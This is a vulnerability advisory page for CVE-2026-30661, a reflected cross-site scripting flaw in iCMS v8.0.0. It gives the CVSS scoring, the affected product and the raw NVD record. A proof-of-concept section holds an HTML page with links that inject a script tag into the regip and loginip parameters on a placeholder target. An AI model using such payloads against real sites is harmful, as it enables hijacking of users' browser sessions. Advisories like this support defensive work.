Security Vulnerability Report
中文
CVE-2026-30661 CVSS 6.1 MEDIUM

CVE-2026-30661

Published: 2026-03-24 15:16:34
Last Modified: 2026-03-25 20:53:28
Source: [email protected]

Description

iCMS v8.0.0 contains a Cross-Site Scripting (XSS) vulnerability in the User Management component, specifically within the index.html file. This allows remote attackers to execute arbitrary web script or HTML via the regip or loginip parameters.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:idreamsoft:icms:8.0.0:*:*:*:*:*:*:* - VULNERABLE
iCMS 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-30661 Description: Inject script into regip or loginip parameters --> <html> <body> <h3>iCMS v8.0.0 XSS PoC</h3> <p>Click the link below to trigger the vulnerability via the 'regip' parameter:</p> <a href="http://target-domain/index.html?regip="><script>alert('XSS_CVE-2026-30661')</script>">Exploit Link (regip)</a> <br/> <p>Alternatively, trigger via 'loginip' parameter:</p> <a href="http://target-domain/index.html?loginip="><script>alert('XSS_CVE-2026-30661')</script>">Exploit Link (loginip)</a> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30661", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:34.350", "lastModified": "2026-03-25T20:53:28.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iCMS v8.0.0 contains a Cross-Site Scripting (XSS) vulnerability in the User Management component, specifically within the index.html file. This allows remote attackers to execute arbitrary web script or HTML via the regip or loginip parameters."}, {"lang": "es", "value": "iCMS v8.0.0 contiene una vulnerabilidad de cross-site scripting (XSS) en el componente de Gestión de Usuarios, específicamente dentro del archivo index.html. Esto permite a atacantes remotos ejecutar scripts web o HTML arbitrarios a través de los parámetros regip o loginip."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:idreamsoft:icms:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B7299423-99C7-42AB-9AEE-21329873F4C2"}]}]}], "references": [{"url": "https://wang1rrr.github.io/2026/02/09/CVE-Report-iCMS-v8.0.0-XSS/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.